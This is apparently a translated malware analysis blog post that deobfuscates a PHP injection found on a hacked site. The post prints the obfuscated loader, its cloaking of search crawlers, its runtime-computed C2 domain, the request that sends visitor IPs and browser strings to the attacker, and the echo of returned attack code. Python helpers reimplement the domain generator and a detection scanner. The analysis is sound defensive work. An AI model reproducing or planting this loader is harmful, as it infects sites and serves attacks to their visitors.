if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {

} else {
	@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800);
	$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));
	if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
		$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
		$evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];
		echo $evalsssgqulVBTkZLAch;
	}
}

Now to go through the tidied code.

$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");

base64-decodes to "stats".

$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");

decodes to "http".

$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");

decodes to "in".

$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");

decodes to "!go!".

$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];

decodes to "HTTP_USER_AGENT". In other words,

$evalrMsivpMgcfC = $_SERVER["HTTP_USER_AGENT"];

is what this is.

eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));

Here the array element [0] that looked like a decoy earlier comes back. It is run through strrev and then base64-decoded, which gives

$fri55 = ';$retarn($fif25,$fif52,$fit52';$fr55 = '$retrun(';$fr52 = 'MKU}f6T4';$fri52 = '\x3d\42\x29\51\x3b';$fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20";eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMo
gKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');

this code. Tidied up:

$fri55 = ';$retarn($fif25,$fif52,$fit52';
$fr55 = '$retrun(';
$fr52 = 'MKU}f6T4';
$fri52 = '\x3d\42\x29\51\x3b';
$fri25 = '\112\x48\112\x6c\144\x48';
$fr25 = $fri52.'")'.$fri55;
$dri25 = "\x24\144\x64\60\x20\75\x20";
eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";
$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";
$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";
preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");
$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');

Running that yields

$dd0 =
$fif25 = "\x40\50\x2e\53\x29\100\x69\145";
$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";
$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";
preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37\112\x48\112\x6c\144\x48\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75\x3d\42\x29\51\x3b");
$psi1=$retrun("MKU}f6T4PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").$retrun('MKU}f6T4LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@').$retrun('MKU}f6T4PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:').$retrun('MKU}f6T4PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@');$dd0 = $retun("",$psi1.$retrun("fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").$retrun("OpQyeVL:"));

which is code again: $dd0 is a function whose whole body is assembled this way.

The content of $psi1 is

$tsst52 = create_function('$return','return "web-".substr($return,0,3);');$tsst5 = create_function('$return','return md5($return);');$tsst51 = create_function('','return mt_rand(1-1,1+1);');$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');

This is what comes back.

This part creates anonymous functions with create_function.

With this we find that

$dd0() = "f528764d624db129b32c21fbca0cb8d6.com";

is the value $dd0() produced when evaluated; the domain is computed at run time rather than stored anywhere in the file.
Tidied up:

$tsst52 = create_function('$return','return "web-".substr($return,0,3);');
$tsst5 = create_function('$return','return md5($return);');
$tsst51 = create_function('','return mt_rand(1-1,1+1);');
$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');

These are the four helpers.
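An added example, not from the original post: the helper the sample calls retrun() (defined by the fourth preg_replace in the $dd0 builder above) shifts every character down by 3 and base64-decodes the result. Re-implementing it in Python reads the four $retrun() strings above, and also the two in the tail of $dd0, which the post leaves encoded; the tail is `return $tsst5($tsst512($tsst52($tsst5($tsst51())))).".com";`. make_domain() is my re-implementation of that chain with DNS replaced by a resolve callback, and candidate_hostnames() is mine too; the ciphertext strings are copied from the code above.

```python
import base64
import hashlib

# Added example (not part of the original post): the helper the sample names
# retrun() shifts every character down by 3 (chr(ord($c)-3), applied through
# array_walk) and then base64-decodes the result. Re-implementing it reads the
# strings handed to $retrun() above, including the tail that builds $dd0's
# return value, which the post leaves encoded. The DNS stub is mine.


def retrun(s: str) -> str:
    shifted = "".join(chr(ord(c) - 3) for c in s)
    return base64.b64decode(shifted).decode("latin-1")


# Arguments exactly as passed to $retrun() when $psi1 and $dd0 are built
# (raw strings: the backslashes are part of the ciphertext).
PSI1_PARTS = [
    r"MKU}f6T4PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@",
    r"MKU}f6T4LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@",
    r"MKU}f6T4PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:",
    r"MKU}f6T4PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@",
]
TAIL_PARTS = [
    r"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@",
    r"OpQyeVL:",
]


def dd0_source() -> str:
    """The PHP body that create_function("", ...) compiles into $dd0."""
    return "".join(retrun(p) for p in PSI1_PARTS + TAIL_PARTS)


def make_domain(rand_value: int, resolve) -> str:
    """What $dd0() computes. `resolve` stands in for gethostbyname(); PHP returns
    the hostname unchanged when resolution fails, so pass `lambda h: h` for that case."""
    md5 = lambda s: hashlib.md5(s.encode()).hexdigest()
    host = "web-" + md5(str(rand_value))[:3] + ".ca"  # $tsst52($tsst5($tsst51()))
    return md5(resolve(host)) + ".com"                 # $tsst5($tsst512(...)).".com"


def candidate_hostnames() -> list:
    """mt_rand(1-1, 1+1) is mt_rand(0, 2): only three seed hostnames are possible."""
    return ["web-" + hashlib.md5(str(n).encode()).hexdigest()[:3] + ".ca" for n in range(3)]


if __name__ == "__main__":
    print(dd0_source())
    print(candidate_hostnames())
    print(make_domain(0, lambda h: h))
```

So the C2 domain is md5(gethostbyname("web-xxx.ca")) . ".com", where xxx is the first three hex digits of md5("0"), md5("1") or md5("2"), i.e. one of web-cfc.ca, web-c4c.ca, web-c81.ca. gethostbyname hands back the name unchanged when it does not resolve, so the attacker steers the result through those .ca DNS records (or their absence); that is why the value seen above is a 32-hex-digit .com name, and why it can change between runs if the records change.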

 

$evalTtDntGsohDPt = array(
 evalMNhPOlTagIOfBSF("R29vZ2xl"),
 evalMNhPOlTagIOfBSF("U2x1cnA="),
 evalMNhPOlTagIOfBSF("TVNOQm90"),
 evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="),
 evalMNhPOlTagIOfBSF("WWFuZGV4"),
 evalMNhPOlTagIOfBSF("UmFtYmxlcg==")
);

Decoding this array gives

array(
 'Google',
 'Slurp',
 'MSNBot',
 'ia_archiver',
 'Yandex',
 'Rambler'
);

As you can see, this is a list of search-engine crawlers.
At this point we can already guess that the attack code is withheld when the User-Agent is a crawler, a common cloaking trick.

 

eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));

Decoding this gives

eval('function evalWEMBIkqYOIIGcLBn($s) {return @file_get_contents($s);}');

so evalWEMBIkqYOIIGcLBn is just a wrapper around file_get_contents, used to fetch something from somewhere. Given a URL, file_get_contents makes an outbound HTTP request (allow_url_fopen must be enabled, which it is by default).

$evalgKgHOXrDzX = $dd0();
 // $dd0() yields the attacker's server domain name, which is computed at run time as shown above.
if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {
 // If the User-Agent matches one of the crawlers, do nothing. Also do nothing if the visitor already has a cookie named "stats".
} else {
 // Otherwise this branch runs.
@setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800);
 // Set a cookie named "stats" (value md5("stats")) that lasts 10800 seconds, i.e. 3 hours, so the same visitor is not hit again during that time.
$evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));

Resolving the base64 pieces, this builds the URL http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=&b=&h= with i= the visitor's IP address (REMOTE_ADDR), b= the URL-encoded User-Agent and h= the URL-encoded Host header of the infected site.
Accessed from a browser it becomes

http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=210.224.***.***&b=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_7_2%29+AppleWebKit%2F535.7+%28KHTML%2C+like+Gecko%29+Chrome%2F16.0.912.75+Safari%2F535.7&h=isidai.sakura.ne.jp
 (IP address redacted)

and that is what gets passed to file_get_contents. So every eligible visitor's IP, browser and the infected hostname are reported to the attacker's server, which can then decide what to send back.

 if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){
 // strstr(<response>, '!go!')

Presumably the attack proceeds when the attacker's server returns a response that contains !go!.

 $evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch);
 $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];

The response is split on !go! and element [1] is taken, so the text between the first marker and the next one (or the end of the response, if there is only one) is assigned.

echo $evalsssgqulVBTkZLAch;

The attack code assigned above is echoed into the page the browser receives, and that is where the actual attack takes place.

}
 }

So, for all the layers of obfuscation, what the code does is fetch attack code with file_get_contents and print it into the page. There is crawler avoidance and a 3-hour cookie so each visitor is hit only once, but at heart it is a simple attack.
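As a final, added example (not from the original post): a quick triage scanner for the markers this sample leaves behind, so the rest of a web root can be swept for siblings. The patterns are lifted from the code above; the signature names, the two-signature threshold and the three sample inputs are mine.

```python
import re

# Added example (not part of the original post): a triage scanner for the
# constructs this sample relies on, so other files on the same host can be
# found quickly. The patterns come from the code shown above; the inputs are
# constructed snippets. Treat hits as leads to inspect, not proof of infection.

SIGNATURES = {
    # variable names from this family: $eva1... / $eval... with a long random tail
    "eva1_varnames": re.compile(r"\$eva[1l][A-Za-z0-9]{10,}"),
    # six or more consecutive \xHH / \NNN escapes: strings hidden as escape runs
    "escape_runs": re.compile(r"(?:\\(?:x[0-9A-Fa-f]{2}|[0-7]{1,3})){6,}"),
    # float arithmetic inside chr(): a constant hidden as 2687.5*0.016
    "chr_float_math": re.compile(r"chr\(\s*\d+(?:\.\d+)?\s*\*\s*\d*\.\d+\s*\)"),
    # preg_replace() whose pattern literal carries the e (eval) modifier
    "preg_replace_e": re.compile(
        r"""preg_replace\s*\(\s*(["'])(\W).*?\2[A-Za-z]*e[A-Za-z]*\1""", re.S),
    # eval(<decoder>(strrev(...))): reversed-then-decoded payloads
    "eval_strrev": re.compile(r"eval\s*\(\s*\w+\s*\(\s*strrev\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
    "silence_errors": re.compile(r"@error_reporting\s*\(\s*0\s*\)"),
}


def scan(text: str) -> dict:
    """Map each matching signature name to its hit count."""
    return {name: len(rx.findall(text)) for name, rx in SIGNATURES.items() if rx.search(text)}


def is_suspicious(text: str, min_signatures: int = 2) -> bool:
    """Two independent obfuscation markers in one file is a strong lead."""
    return len(scan(text)) >= min_signatures


# Constructed inputs: a few lines of the loader above, a few lines of its
# decoded stage, and an innocent script that also happens to use base64.
LOADER = r'''<?php
@error_reporting(0);
if (!isset($eva1fYlbakBcVSir)) {
    $eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";
    $eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";
    $eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
}
?>'''

DECODED_STAGE = r'''preg_replace("@(.+)@ie", 'eval("\1");', '@eval(base64_decode($eva1tYidakBcVSjr[1]));');
eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
$tsst5 = create_function('$return','return md5($return);');'''

BENIGN = r"""<?php
$token = base64_decode($_POST['token'] ?? '');
echo htmlspecialchars($token, ENT_QUOTES, 'UTF-8');"""


if __name__ == "__main__":
    for name, text in (("loader", LOADER), ("decoded", DECODED_STAGE), ("benign", BENIGN)):
        print(name, scan(text), "SUSPICIOUS" if is_suspicious(text) else "ok")
```

Feed scan() the contents of each PHP file under the web root; a file that trips two or more signatures deserves a look. base64_decode on its own is deliberately not a signature, because plenty of legitimate code uses it (the benign sample shows that); it is the combination with reversed strings, escape runs and float-hidden constants that marks this family.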

Seriously exhausting, OTL
